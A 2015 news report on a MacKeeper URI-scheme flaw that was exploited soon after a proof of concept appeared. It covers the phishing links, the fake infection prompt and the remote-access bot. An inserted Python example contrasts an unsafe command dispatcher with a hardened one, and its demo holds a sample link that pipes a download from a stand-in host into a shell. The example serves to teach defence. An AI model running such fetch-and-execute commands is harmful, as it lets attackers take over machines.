Observed attack adds malware that can execute shell commands

Jun 6, 2015 09:43 GMT

The MacKeeper flaw disclosed last month was quickly exploited by cybercriminals, who had public proof-of-concept (PoC) code to start from.

Discovered and reported by security researcher Braden Thomas, the flaw lay in MacKeeper's handling of its custom URI schemes: a crafted link could trigger unwanted actions such as uninstalling programs or downloading malware.

The root cause was insufficient validation of the commands MacKeeper executed on behalf of its custom links. If the user had already authenticated to MacKeeper, an attacker who got the victim to open a malicious link could run commands on the machine with root privileges.
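
To make the bug class concrete, here is an added example (not MacKeeper's code; the page does not describe the real scheme, command names or parameters, so the "demoapp" scheme, the "scan" and "uninstall" commands and the "cmd", "arg" and "target" query parameters are assumptions): a URL-scheme handler that hands whatever the link carries to a privileged helper, beside one that allowlists commands, validates each argument and still requires explicit user confirmation regardless of any earlier authentication.

```python
"""Custom URL-scheme command dispatch: an unsafe pattern and a hardened one.

Added illustration, not MacKeeper's code. The scheme name "demoapp", the
command names and the query parameters are assumptions made for this example.
"""
from dataclasses import dataclass
from pathlib import PurePosixPath
from typing import Optional
from urllib.parse import parse_qs, urlparse

SCHEME = "demoapp"                          # assumed scheme the app registers
APP_ROOT = PurePosixPath("/Applications")   # assumed location of removable apps

# Assumed command set: name -> the single query parameter it accepts (or None).
ALLOWED_COMMANDS = {"scan": None, "uninstall": "target"}


@dataclass(frozen=True)
class Action:
    """A validated request that still needs explicit user confirmation."""
    command: str
    target: Optional[str] = None


class RejectedURL(ValueError):
    """Raised when a link fails validation."""


def dispatch_unsafe(url: str, already_authenticated: bool) -> str:
    """The vulnerable pattern.

    Whatever command and argument the link carries becomes the command line
    handed to the privileged helper, and an earlier admin authentication is
    treated as permission to run it. Returns the line that would be executed.
    """
    if not already_authenticated:
        raise RejectedURL("no privileged session")
    params = parse_qs(urlparse(url).query)
    command = params.get("cmd", [""])[0]
    argument = params.get("arg", [""])[0]
    return f"{command} {argument}".strip()   # attacker-controlled string


def dispatch_safe(url: str) -> Action:
    """The hardened pattern.

    Only a fixed set of commands is accepted, each with a fixed parameter;
    paths are confined to APP_ROOT; nothing is ever turned into a shell
    string; and the result is an Action the user must still confirm,
    whether or not an earlier authentication exists.
    """
    parsed = urlparse(url)
    if parsed.scheme != SCHEME:
        raise RejectedURL(f"unexpected scheme {parsed.scheme!r}")
    command = parsed.netloc                 # demoapp://<command>?<params>
    if command not in ALLOWED_COMMANDS:
        raise RejectedURL(f"unknown command {command!r}")
    params = parse_qs(parsed.query)
    expected = ALLOWED_COMMANDS[command]
    if expected is None:
        if params:
            raise RejectedURL(f"{command!r} takes no parameters")
        return Action(command)
    if set(params) != {expected} or len(params[expected]) != 1:
        raise RejectedURL(f"{command!r} needs exactly one {expected!r}")
    target = PurePosixPath(params[expected][0])
    # Reject relative paths, traversal and anything outside APP_ROOT.
    # PurePosixPath does not collapse "..", so the parts check is required.
    if (not target.is_absolute() or ".." in target.parts
            or APP_ROOT not in target.parents):
        raise RejectedURL(f"{str(target)!r} is outside {APP_ROOT}")
    if target.suffix != ".app":
        raise RejectedURL("only application bundles may be removed")
    return Action(command, str(target))


def is_rejected(url: str) -> bool:
    """True if the hardened handler refuses the link."""
    try:
        dispatch_safe(url)
    except RejectedURL:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample links, not taken from the observed attack.
    benign = f"{SCHEME}://uninstall?target=/Applications/OldTool.app"
    hostile = f"{SCHEME}://run?cmd=curl%20http://evil.example/x%20|%20sh"
    print("unsafe handler would run:", dispatch_unsafe(hostile, True))
    print("safe handler accepts:", dispatch_safe(benign))
    print("safe handler rejects hostile link:", is_rejected(hostile))
```

The point of returning an Action rather than executing it is that the link can only ever request one of a few named operations, and the user sees exactly which one before anything privileged happens; a prompt that says "enter your password to clean the infection" while the URL actually carries an arbitrary command is what the hardened handler makes impossible.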

After the PoC was published, crooks wasted no time launching attacks

The developer released version 3.4.1, which fixes the flaw. There is no estimate of how many users were affected, but the number is likely to be high: MacKeeper advertised over 20 million installations as of March 24.

Cybercriminals began exploiting the flaw in the wild about two days after the PoC was made public, says Sergei Shevchenko, cyber researcher at BAE Systems. A window that short may not have been enough for many users to apply the update.

Shevchenko analyzed an attack in which the victim received an email containing a malicious link. Opening the link made MacKeeper display a dialog saying the computer was infected with malware and asking for the user's password to clean it up. Because the prompt came from a legitimately installed application, it looked trustworthy; entering the password actually let the attacker's payload run with administrator privileges.

No need for targeted attacks, MacKeeper is popular enough

In the attack observed by the researcher, the payload dropped on the computer was a bot that gave the attackers remote access.

Its functionality included executing shell commands, exfiltrating data, and downloading files from a command and control (C&C) server and executing them.

During the analysis, the researcher found that the malware checks for Internet connectivity by requesting the Google search page, and keeps retrying until the page loads.

Shevchenko said that, given MacKeeper's large install base, cybercriminals can send the emails indiscriminately and still have a good chance of reaching someone with the program installed.

[UPDATE]: Shortly after this article was published, MacKeeper contacted us and pointed to a company blog post saying that almost all users of the product have received the latest update.

"There is a small percentage of users who are not active, have not launched the application, or they are offline," the company said, adding that its efforts to fix the flaw, push the update and inform users of the risk had paid off, and that it believes there is no "population of MacKeeper users who currently are at risk."

On Friday, the company said it had no information about specific cases of malware targeting MacKeeper users.